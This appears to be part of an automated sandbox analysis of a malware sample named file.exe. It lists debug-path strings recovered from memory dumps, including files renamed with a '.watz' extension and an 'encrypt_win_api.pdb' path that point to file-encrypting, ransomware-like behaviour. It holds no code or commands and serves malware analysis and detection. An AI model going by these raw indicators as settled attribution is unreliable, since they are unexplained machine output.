          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\x\nc\ source: file.exe, 00000007.00000003.2741340154.000000000368C000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: file.exe, 00000007.00000003.2673162145.00000000038F1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2660040298.000000000374D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2673632116.0000000003901000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\\/ source: file.exe, 00000007.00000003.2741597672.0000000003A30000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2744837562.0000000003A49000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\\d\$ source: file.exe, 00000007.00000003.2749544594.0000000003189000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2741186594.0000000003175000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2750832515.0000000003189000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdbche\AppCache133409611734040046.txtR source: file.exe, 00000007.00000003.2593566372.0000000003606000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2594290640.0000000003612000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\k source: file.exe, 00000007.00000003.2736612029.0000000003A3A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2725574739.0000000003A3A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2730941705.0000000003A3A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\g source: file.exe, 00000007.00000003.2724576983.0000000003990000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2698806550.0000000003989000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2696058379.0000000003960000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2698247902.0000000003961000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2725574739.0000000003999000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\M\ts\ source: file.exe, 00000007.00000003.2761328703.0000000003AD6000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: file.exe, 00000007.00000003.2593566372.0000000003606000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2594290640.0000000003612000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\* source: file.exe, 00000007.00000003.2593566372.0000000003606000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2594290640.0000000003612000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\ source: file.exe, 00000007.00000003.2672799622.0000000003756000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2671298531.0000000003751000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\\ source: file.exe, 00000007.00000003.2670677971.00000000035B5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2672571739.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2671990261.00000000035C3000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ce\ source: file.exe, 00000007.00000003.2660786899.0000000003612000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2660936222.0000000003626000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\ source: file.exe, 00000007.00000003.2695973619.000000000361E000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: file.exe, 00000007.00000003.2725549066.000000000314C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2730153684.0000000003150000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2724350929.0000000003147000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\C\ source: file.exe, 00000007.00000003.2741186594.0000000003175000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\ source: file.exe, 00000007.00000003.2638711468.0000000003731000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\EdgePushStorageWithWinRt\.pdb\ source: file.exe, 00000007.00000003.2760080871.00000000039D8000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\*\*$ source: file.exe, 00000007.00000003.2735635475.0000000003181000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2730755035.000000000317A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2730153684.0000000003150000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.errorCache\SettingsCache.txt.watz source: file.exe, 00000007.00000003.2593566372.0000000003606000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2594290640.0000000003612000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: file.exe, 00000007.00000003.2724576983.0000000003990000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2698806550.0000000003989000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2696058379.0000000003960000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2698247902.0000000003961000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2695973619.000000000361E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2725574739.0000000003999000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\m( source: file.exe, 00000007.00000003.2730941705.00000000039B1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2741597672.00000000039B8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2744942555.00000000039C9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2743236831.00000000039B8000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: file.exe, 00000007.00000003.2755211411.0000000003AA2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2756609784.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2750931646.0000000003AFE000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: sers\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb.watz source: file.exe, 00000007.00000003.2593813478.000000000317C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2593731037.000000000316A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: file.exe, 00000007.00000003.2638999473.00000000035C7000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\\Q source: file.exe, 00000007.00000003.2593566372.0000000003606000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2594290640.0000000003612000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ate\ source: file.exe, 00000007.00000003.2454804207.000000000313C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2427038316.000000000313B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2593731037.000000000312B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2638455069.000000000313F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2594175712.0000000003131000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2639171288.0000000003142000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\; source: file.exe, 00000007.00000003.2671364003.000000000378D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2670719853.000000000376D000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\434\* source: file.exe, 00000007.00000003.2381853776.0000000000930000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\@ source: file.exe, 00000007.00000003.2671364003.000000000378D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2697886616.0000000003791000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2695735716.000000000374C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2670719853.000000000376D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2696774171.000000000378D000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\Z source: file.exe, 00000007.00000003.2454804207.000000000313C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2638362574.0000000003150000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2427038316.000000000313B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2593731037.000000000312B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2454987079.0000000003145000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2594175712.0000000003131000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\_ source: file.exe, 00000007.00000003.2755482163.0000000003754000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2755830820.000000000375C000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\\ source: file.exe, 00000007.00000003.2742668991.0000000003791000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2743867571.0000000003799000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ies\& source: file.exe, 00000007.00000003.2671364003.000000000378D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2670719853.000000000376D000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*o source: file.exe, 00000007.00000003.2593566372.0000000003606000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2594290640.0000000003612000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: file.exe, 00000007.00000003.2730941705.00000000039B1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2741597672.00000000039B8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2744942555.00000000039C9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2743236831.00000000039B8000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\^ source: file.exe, 00000007.00000003.2736612029.0000000003A3A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2725574739.0000000003A3A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2730941705.0000000003A3A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\Temp\) source: file.exe, 00000007.00000003.2696325767.0000000003921000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: file.exe, 00000007.00000003.2674394625.0000000003108000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\E| source: file.exe, 00000007.00000003.2736612029.0000000003A51000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2741597672.0000000003A30000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2745251936.0000000003A5B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2744837562.0000000003A49000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\\4 source: file.exe, 00000007.00000003.2593566372.0000000003606000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2594290640.0000000003612000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\ source: file.exe, 00000007.00000003.2639517770.0000000003124000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2593877626.0000000003113000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2639724699.0000000003126000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2638739498.0000000003113000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2638912113.0000000003123000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*W source: file.exe, 00000007.00000003.2412421921.000000000315E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2454804207.000000000313C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2638362574.0000000003150000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2411377247.0000000003139000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2427038316.000000000313B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2593731037.000000000312B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2411493642.0000000003152000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2454987079.0000000003145000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2412375336.0000000003152000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2594175712.0000000003131000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2412325880.0000000003145000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\tW source: file.exe, 00000007.00000003.2673162145.00000000038F1000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\*r\[ source: file.exe, 00000007.00000003.2750931646.0000000003A83000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\\H source: file.exe, 00000007.00000003.2593566372.0000000003606000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2594290640.0000000003612000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\ source: file.exe, 00000007.00000003.2751614715.0000000000933000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\M source: file.exe, 00000007.00000003.2730941705.00000000039B1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2735871290.00000000039E9000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\\ source: file.exe, 00000007.00000003.2593566372.0000000003606000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2594290640.0000000003612000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error.watz- source: file.exe, 00000007.00000003.2593566372.0000000003606000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2594290640.0000000003612000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\s\ab/ source: file.exe, 00000007.00000003.2638556300.0000000003606000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2639256814.0000000003623000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2638801916.0000000003622000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\M source: file.exe, 00000007.00000003.2379890831.0000000003108000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2379930472.000000000310D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2381763489.000000000310D000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdbF source: file.exe, 00000007.00000003.2639109083.0000000003612000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2638556300.0000000003606000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2593566372.0000000003606000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2594290640.0000000003612000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\ source: file.exe, 00000007.00000003.2594016222.00000000035BB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2639666829.00000000035BD000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\J source: file.exe, 00000007.00000003.2755211411.0000000003AA2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2741597672.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2750931646.0000000003A83000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2743963892.0000000003A79000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: file.exe, 00000007.00000003.2638556300.0000000003606000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2639575185.000000000367F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2639256814.0000000003623000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2638801916.0000000003622000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: file.exe, 00000007.00000003.2743963892.0000000003ABA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2750931646.0000000003A83000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ory\ source: file.exe, 00000007.00000003.2593566372.0000000003606000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2594290640.0000000003612000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\$# source: file.exe, 00000007.00000003.2755211411.0000000003AA2000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\e\ source: file.exe, 00000007.00000003.2725712651.0000000003617000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2734579091.0000000003614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2736175037.0000000003636000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2735075087.0000000003626000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2725226739.0000000003616000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2725916015.0000000003626000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\\+ source: file.exe, 00000007.00000003.2593566372.0000000003606000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2594290640.0000000003612000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb.watz source: file.exe, 00000007.00000003.2593566372.0000000003606000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2594290640.0000000003612000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\8bb source: file.exe, 00000007.00000003.2381738075.0000000003171000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2454804207.000000000316A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2411377247.000000000316A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2454987079.000000000316A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2427038316.000000000316A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2412375336.000000000316A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2593813478.000000000317C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2593731037.000000000316A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: file.exe, file.exe, 00000006.00000002.2456931557.0000000002330000.00000040.00001000.00020000.00000000.sdmp, file.exe, 00000007.00000002.2763316136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, file.exe, 00000009.00000002.2418903589.0000000002260000.00000040.00001000.00020000.00000000.sdmp, file.exe, 0000000B.00000002.2503244707.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, file.exe, 0000000C.00000002.2433084829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, file.exe, 0000000D.00000002.2476597586.0000000000400000.00000040.00000400.00020000.00000000.sdmp, file.exe, 0000000F.00000002.3353830143.0000000000400000.00000040.00000400.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\21\ source: file.exe, 00000007.00000003.2379890831.0000000003108000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2379930472.000000000310D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2381763489.000000000310D000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\tory\ source: file.exe, 00000007.00000003.2593566372.0000000003606000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2594290640.0000000003612000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\| source: file.exe, 00000007.00000003.2756141965.0000000003A4A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\.watz source: file.exe, 00000007.00000003.2454804207.000000000316A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2638362574.0000000003150000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2411377247.000000000316A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2638414568.000000000317A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2639138536.0000000003182000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2454987079.000000000316A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2427038316.000000000316A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2412375336.000000000316A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2593813478.000000000317C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2593731037.000000000316A000.00000004.00000020.00020000.00000000.sdmp
